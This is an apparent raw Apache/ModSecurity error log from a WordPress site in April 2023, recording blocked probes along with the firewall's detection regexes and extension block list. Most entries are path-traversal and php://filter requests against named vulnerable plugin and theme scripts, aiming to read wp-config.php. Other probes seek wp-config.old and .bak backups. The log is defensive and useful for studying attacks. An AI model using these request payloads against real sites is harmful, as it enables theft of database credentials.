"/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "ZEefhl4G6tVEc6w5Us7hggAAANA"] [Tue Apr 25 04:38:15.120275 2023] [:error] [pid 15889:tid 140447203165952] [client 37.120.213.169:42836] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZEefh14G6tVEc6w5Us7hgwAAAMM"] [Tue Apr 25 04:38:15.267486 2023] [:error] [pid 15580:tid 140447186380544] [client 37.120.213.169:42838] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php%2Fwp-content%2Fplugins%2Fhb-audio-gallery-lite%2Fgallery%2Faudio-download.php%3Ffile_path%3D..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "ZEefh9-GjcOLRjW9Sa4WvQAAAIU"] [Tue Apr 25 04:38:15.417433 2023] [:error] [pid 15889:tid 140447083120384] [client 37.120.213.169:42840] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZEefh14G6tVEc6w5Us7hhAAAAMk"] [Tue Apr 25 04:38:18.000390 2023] [:error] [pid 15579:tid 140446999193344] [client 37.120.213.169:42850] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZEefiSIlOCjnXl5Klpeg2AAAAFM"] [Tue Apr 25 04:38:18.119800 2023] [:error] [pid 15578:tid 140447066334976] [client 37.120.213.169:42852] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZEefij754oNYNW-15_AYzAAAAAs"] [Tue Apr 25 04:38:18.236259 2023] [:error] [pid 15580:tid 140447194773248] [client 37.120.213.169:42854] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-downloader/ebook_plugin.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-downloader/ebook_plugin.php"] [unique_id "ZEefit-GjcOLRjW9Sa4WvgAAAIQ"] [Tue Apr 25 04:38:18.354306 2023] [:error] [pid 15580:tid 140447041156864] [client 37.120.213.169:42856] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-shortcode/inc/force-download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-shortcode/inc/force-download.php"] [unique_id "ZEefit-GjcOLRjW9Sa4WvwAAAI4"] [Tue Apr 25 04:38:18.487923 2023] [:error] [pid 15579:tid 140447041156864] [client 37.120.213.169:42858] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "ZEefiiIlOCjnXl5Klpeg2QAAAE4"] [Tue Apr 25 04:38:20.036408 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:42866] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kap/download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kap/download.php"] [unique_id "ZEefjN-GjcOLRjW9Sa4WwAAAAII"] [Tue Apr 25 04:38:20.164901 2023] [:error] [pid 15889:tid 140447091513088] [client 37.120.213.169:42868] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/oxygen-theme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZEefjF4G6tVEc6w5Us7hiAAAAMg"] [Tue Apr 25 04:38:20.290562 2023] [:error] [pid 15889:tid 140446965622528] [client 37.120.213.169:42870] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/rowe/download/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/rowe/download/download.php"] [unique_id "ZEefjF4G6tVEc6w5Us7hiQAAANc"] [Tue Apr 25 04:38:22.230461 2023] [:error] [pid 15889:tid 140447108298496] [client 37.120.213.169:42878] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "ZEefjl4G6tVEc6w5Us7hjAAAAMY"] [Tue Apr 25 04:38:28.155486 2023] [:error] [pid 15580:tid 140447074727680] [client 37.120.213.169:42900] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:img. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: http/1.0 found within ARGS:img: ../wp-config.php?http/1.0?action=revslider_show_image"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZEeflN-GjcOLRjW9Sa4WxAAAAIo"] [Tue Apr 25 04:38:31.105923 2023] [:error] [pid 15580:tid 140446957229824] [client 37.120.213.169:42910] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZEefl9-GjcOLRjW9Sa4WxgAAAJg"] [Tue Apr 25 04:38:31.976296 2023] [:error] [pid 15580:tid 140447203165952] [client 37.120.213.169:42914] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZEefl9-GjcOLRjW9Sa4WyAAAAIM"] [Tue Apr 25 11:44:44.550552 2023] [:error] [pid 15580:tid 140447007586048] [client 185.81.157.160:40054] [client 185.81.157.160] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZEgDfN-GjcOLRjW9Sa4gjgAAAJI"] [Tue Apr 25 11:44:44.893373 2023] [:error] [pid 15889:tid 140447015978752] [client 185.81.157.160:40056] [client 185.81.157.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZEgDfF4G6tVEc6w5Us7x8AAAANE"] [Tue Apr 25 11:44:45.440903 2023] [:error] [pid 15889:tid 140447007586048] [client 185.81.157.160:40058] [client 185.81.157.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZEgDfV4G6tVEc6w5Us7x8QAAANI"] [Tue Apr 25 14:43:00.233963 2023] [:error] [pid 15580:tid 140447024371456] [client 5.188.62.26:50052] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEgtRN-GjcOLRjW9Sa4kqgAAAJA"] [Tue Apr 25 15:10:58.328588 2023] [autoindex:error] [pid 15889:tid 140447186380544] [client 170.106.199.181:51552] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Apr 25 16:19:35.335306 2023] [autoindex:error] [pid 15579:tid 140446965622528] [client 37.139.1.229:55972] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 25 16:19:37.580375 2023] [autoindex:error] [pid 15578:tid 140447007586048] [client 37.139.1.229:55978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 25 16:55:21.046104 2023] [:error] [pid 15889:tid 140446957229824] [client 5.188.62.21:58222] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEhMSV4G6tVEc6w5Us7-IAAAANg"] [Wed Apr 26 05:55:29.976244 2023] [autoindex:error] [pid 9373:tid 139910220535552] [client 103.69.130.74:41922] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Apr 26 05:55:32.759856 2023] [autoindex:error] [pid 9148:tid 139910178572032] [client 103.69.130.74:41928] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Apr 26 11:16:01.479531 2023] [autoindex:error] [pid 9148:tid 139910296069888] [client 172.187.192.35:57312] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 26 22:00:34.226110 2023] [:error] [pid 9147:tid 139910296069888] [client 5.188.62.174:44014] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEnlUiuuuLbVXjZ9KsiepgAAAEo"] [Thu Apr 27 01:33:27.567610 2023] [:error] [pid 9373:tid 139910254106368] [client 152.89.196.77:54308] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match 